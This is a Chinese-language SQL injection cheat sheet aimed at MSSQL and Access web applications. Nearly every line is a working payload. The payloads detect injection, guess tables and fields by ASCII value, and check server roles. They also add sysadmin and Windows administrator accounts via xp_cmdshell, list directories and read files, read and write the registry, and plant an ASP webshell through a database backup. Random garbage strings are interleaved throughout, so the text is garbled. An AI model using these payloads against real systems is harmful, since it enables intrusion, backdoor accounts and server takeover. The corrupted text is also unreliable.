1.判断是否有注入;and 1=1 ;and 1=2 0<8XI>.3�D
2.初步判断是否是mssql ;and user>0 e#,�~�,W.H
nOQa_G]G�z
3.注入参数是字符'and [查询条件] and ''=' �F�� q!fWl
6Z`R#d #�I
4.搜索时没过滤参数的'and [查询条件] and '%25'=' w~#nYM=fP!
Yp0/Ab(�v�
5.判断数据库系统 �,jC3�Fcly
A]��.�>.AI
;and (select count(*) from sysobjects)>0 mssql 16L]�=��&@
4�Q�IE8f
Y
;and (select count(*) from msysobjects)>0 access ]r3Kg12�Mi
>XO�iu#k�C
��s�;�1]tD
�]`��bQW?
6.猜数据库 ;and (select Count(*) from [数据库名])>0 <"� @z�n��
�x����A�u/
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 &QG6!`fK}3
�q %0C�g=
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 hky�;CD~$�
��S!P�zLTc
9.(1)猜字段的ascii值(access) +dB�z`W�D
LTJ��c,3\,
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 % aUsOB-RV
>HPdzLY?�
(2)猜字段的ascii值(mssql) D�Ag58
=qJ
R�NPb�H�.
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 N$x�tHtz8"
6{��,H��iY
10.测试权限结构(mssql) `MEYd ��U1
&20�P,�8@�
�aF|�d�^��
��@$"L:1�_
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ^��FZ�^6*�
>a1{39�7Y}
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- _5MNMV�LwW
\v6�M:KR5/
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��)R�YG��%
�bS
>0DU �
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 5'�w^@Rs5
/�%4_-C�pm
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �5j0{p$�'9
W2�3]B��x�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- BZb]SoA�L�
!;6���Jng%
;and 1=(select IS_MEMBER('db_owner'));-- OG3/-K��8R
GHF_R�,��7
fb�F�X4�?-
Y�p�Up@/�"
11.添加mssql和系统的帐户 W�>M~Sk$v�
^).�� �)��
;exec master.dbo.sp_addlogin username;-- -Q�;#s�J?�
;exec master.dbo.sp_password null,username,password;-- i)Lp�7m� z
iq�hOi|!�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- +Z!;�P
Z6
e�QO#Qso�]
;exec master.dbo.xp_cmdshell 'net user username password y�[��O-pD`
fag^�7r��z
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 3�`HnLD/��
nK3�k]gLc{
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 4��$,,Ppn�
)4xu^=N&as
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- %~j2 �(�'Y
.[�DthEF
vRA',(](
�zH�=!*[d8
12.(1)遍历目录 qQ7w&9r.M
�1\dn�1H�h
;create table dirs(paths varchar(100), id int) 4gdY`}8b^}
/w]&�t\�]*
;insert dirs exec master.dbo.xp_dirtree 'c:\' �^�*R�(!P^
�V �'X;�jC
;and (select top 1 paths from dirs)>0 6@tvRDeaDW
�+Ra3bj��l
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) jnu�Y{0�(&
IGF��G�a@C
�!�C:r�b��
W�v!<�bT8r
(2)遍历目录 1u]P4�G�f=
�*.f2�VQ~H
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �0;~yZ?6_F
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 :^C'<SY2Gs
DE{�h�5-g
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 +rNkN:/�L
tn/T6C^��)
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 {bF1\��S]2
�<64Hve��J
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 xPmN},i'R$
}0=<�6\+:`
�F.q|x|9j
t~K%.|'�0
13.mssql中的存储过程 �7N2\�8�kP
Q"J�-t�P�!
xp_regenumvalues 注册表根键, 子键 �:�ip�oD%@
m4��ApHM2
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��NB�8�& �
1M%S
g�V-#
xp_regread 根键,子键,键值名 }4%/�pOi:f
���W^g[L:s
;exec xp_regread w,.qCp�T$_
!UV�5��zmS
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 N:+
ta�z�-
��fW0$�s`�
xp_regwrite 根键,子键, 值名, 值类型, 值 wp�Pn�}[a�
`T!#@&��+�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 sLcY,��A�H
"Q+83adY4x
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 z>vt�EV))
~waNPjP�RG
xp_regdeletevalue 根键,子键,值名 �WX�UkuO�
t
�Y1E�t0�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 "/x_>ui1�F
x�%BF�{S�w
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 b��#�Kq�[}
=_=*O�EgO]
�5vZ#b\;#V
�wODvc9p}]
14.mssql的backup创建webshell 8<PKKDgbfd
mVH,HqsX�a
use model H�:o���Q��
�XQ;I,�\m�
create table cmd(str image); �['Z�{�@�9
�Sgj/s~j~1
insert into cmd(str) values (''); )r!e�2zc=Q
V�7<eQ0;m
backup database model to disk='c:\l.asp'; Px4/O~�bLk
��oN�RG2�5
NCt�~9xS�.
\aSz2lxEHn
15.mssql内置函数 ;E�l <%{(�
m���/�$�{8
;and (select @@version)>0 获得Windows的版本号 i2F(GH?p[
r+g��jc?Ol
;and user_name()='dbo' 判断当前系统的连接用户是不是sa [e�4![G&y`
��F1u)�i�
;and (select user_name())>0 爆当前系统的连接用户 �;) pl�{_�
TgaYt\"i[�
;and (select db_name())>0 得到当前连接的数据库 �X8 qI��ia
.�hz2&9Ow�
oX|�?:M�S:
#8?�^C]*{0
16.简洁的webshell yq*�Jd�TF�
sJ6a7A�8�)
use model �sc ��xLB;
!C`20��,�U
create table cmd(str image); �B7� �c[�4
.Ty,_3+{#p
insert into cmd(str) values (''); Vi�pp /�WV
~%P����3Pp
backup database model to disk='g:\wwwtest\l.asp';
